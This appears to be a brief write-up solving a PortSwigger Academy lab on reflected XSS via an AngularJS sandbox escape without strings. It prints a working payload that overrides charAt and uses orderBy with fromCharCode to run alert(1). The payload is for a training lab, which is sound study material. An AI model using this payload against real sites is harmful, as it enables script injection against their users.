Solving Portswigger Academy: Reflected XSS with AngularJS sandbox escape without strings

This lab uses AngularJS in an unusual way where the $eval function is not available and you will be unable to use any strings in AngularJS.

To solve the lab, perform a cross-site scripting attack that escapes the sandbox and executes the alert function without using the $eval function.

So we have to execute the alert in Anuglar JS without using $eval function.

I used various payloads available here, but only one worked for me. Some contain double and single quote which is encoded by the application.

The one that worked is below, but when I paste it in the search bar as is have more characters than allowed length it says length more than 120 characters.

toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

But I directly use this in search box and it solved my problem.